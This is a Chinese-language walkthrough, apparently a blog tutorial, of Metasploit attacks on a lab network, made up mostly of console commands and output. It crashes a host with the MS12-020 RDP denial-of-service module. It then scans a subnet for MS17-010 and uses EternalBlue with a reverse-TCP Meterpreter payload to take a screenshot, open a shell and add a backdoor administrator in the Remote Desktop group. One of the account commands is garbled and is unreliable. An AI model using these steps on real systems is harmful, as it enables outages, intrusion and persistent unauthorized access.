Metasploit

Metasploit是什么？Metasploit是一個免費的、可下載的框架，通過它可以很容易地獲取、開發并對計算機軟件漏洞實施攻擊。它是附帶數百個已知軟件漏洞的專業級漏洞攻擊工具。

如果這樣很難理解，我們換個說法；每天都有無數的漏洞被發現，如果我們每個人都收集幾種并匯聚到一起，修改為相同的操作方式，這就是msf在做的；msf初衷是做一個攻擊工具開發平臺，但現在更多的情況下msf淪為了業余安全愛好者和安全專家的武器庫，只需要點幾下鼠標，就能入侵成功。

MS12-020

MS12-020是一個針對遠程桌面(RDP)協議的漏洞，其最嚴重的情況可能會造成遠程執行代碼，而通常情況下會造成對方藍屏。

利用方法

msfconsole 從終端進入msf框架

查找漏洞代碼

msf > search 12_020[!] Module database cache not built yet, using slow searchMatching Modules================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal MS12-020 Microsoft Remote Desktop Use-After-Free DoS auxiliary/scanner/rdp/ms12_020_check normal MS12-020 Microsoft Remote Desktop Checker

使用該漏洞利用代碼

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

查看使用方法

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show optionsModule options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 3389 yes The target port (TCP)

漏洞模塊為auxiliary/dos/windows/rdp/ms12_020_maxchannelids

參數為 RHOST目標地址，RPORT目標端口。

設置參數

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set RHOST 192.168.136.129RHOST => 192.168.136.129msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set RPORT 3389RPORT => 3389msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show optionsModule options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.136.129 yes The target address RPORT 3389 yes The target port (TCP)

運行

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > exploit[*] 192.168.136.129:3389 - 192.168.136.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS[*] 192.168.136.129:3389 - 192.168.136.129:3389 - 210 bytes sent[*] 192.168.136.129:3389 - 192.168.136.129:3389 - Checking RDP status...[ ] 192.168.136.129:3389 - 192.168.136.129:3389 seems down[*] Auxiliary module execution completed

攻擊完成

對方藍屏

MS12-020是msf中利用比較簡單的一種，可以用來學習msf的框架的簡單使用方法，又能快速增加入侵成功的成就感。

MS17-010(永恒之藍)

永恒之藍是2017年席卷全球的勒索軟件的罪魁禍首，是微軟近些年來最為嚴重的遠程代碼執行漏洞，可以直接獲得系統權限，請所有IT從業人員在任何時候都要打滿補丁以絕后患。

利用方法

進入msf框架

root@kali:~# msfconsole

查找MS17-010相關利用代碼

search 17_010[!] Module database cache not built yet, using slow searchMatching Modules================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/smb/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit/windows/smb/ms17_010_psexec 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

檢測內網中存在漏洞的主機系統

 msf > use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(scanner/smb/smb_ms17_010) > show options Module options (auxiliary/scanner/smb/smb_ms17_010): Name Current Setting Required Description ---- --------------- -------- ----------- CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE false no Check for named pipe on vulnerable hosts NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.136.129/24 RHOSTS => 192.168.136.129/24 msf auxiliary(scanner/smb/smb_ms17_010) > exploit [*] Scanned 26 of 256 hosts (10% complete) [*] Scanned 52 of 256 hosts (20% complete) [*] Scanned 77 of 256 hosts (30% complete) [*] Scanned 103 of 256 hosts (40% complete) [*] Scanned 128 of 256 hosts (50% complete) [ ] 192.168.136.129:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)

加載攻擊模塊

msf auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalbluemsf exploit(windows/smb/ms17_010_eternalblue) > show optionsModule options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target.Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs

配置

msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.136.129RHOST => 192.168.136.129msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.136.131LHOST => 192.168.136.131msf exploit(windows/smb/ms17_010_eternalblue) > show optionsModule options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST 192.168.136.129 yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target.Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.136.131 yes The listen address LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs

發動攻擊

msf exploit(windows/smb/ms17_010_eternalblue) > exploit[*] Started reverse TCP handler on 192.168.136.131:4444 [*] 192.168.136.129:445 - Connecting to target for exploitation.[ ] 192.168.136.129:445 - Connection established for exploitation.[ ] 192.168.136.129:445 - Target OS selected valid for OS indicated by SMB reply[*] 192.168.136.129:445 - CORE raw buffer dump (53 bytes)[*] 192.168.136.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2[*] 192.168.136.129:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris[*] 192.168.136.129:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P[*] 192.168.136.129:445 - 0x00000030 61 63 6b 20 31 ack 1 [ ] 192.168.136.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 192.168.136.129:445 - Trying exploit with 12 Groom Allocations.[*] 192.168.136.129:445 - Sending all but last fragment of exploit packet[*] 192.168.136.129:445 - Starting non-paged pool grooming[ ] 192.168.136.129:445 - Sending SMBv2 buffers[ ] 192.168.136.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 192.168.136.129:445 - Sending final SMBv2 buffers.[*] 192.168.136.129:445 - Sending last fragment of exploit packet![*] 192.168.136.129:445 - Receiving response from exploit packet[ ] 192.168.136.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*] 192.168.136.129:445 - Sending egg to corrupted connection.[*] 192.168.136.129:445 - Triggering free of corrupted buffer.[*] Sending stage (206403 bytes) to 192.168.136.129[*] Meterpreter session 1 opened (192.168.136.131:4444 -> 192.168.136.129:49567) at 2018-04-30 23:31:53  0800[ ] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[ ] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[ ] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

獲取對方電腦桌面

meterpreter > screenshotScreenshot saved to: /root/VrBAGsTE.jpeg

獲得shell權限

meterpreter > shellProcess 4088 created.Channel 1 created.Microsoft Windows [?汾 6.1.7601]??????? (c) 2009 Microsoft Corporation???????????????C:\Windows\system32>

添加管理員并加入遠程桌面組

net user test test123 /addnet user localgroup administrators test /addnet localgroup "Remote Desktop Users" test /add

完成入侵。

MS17-010在msf里屬于中等使用難度，涉及了掃描、配置回鏈方式、桌面抓圖、提權等手段，是非常好的學習對象。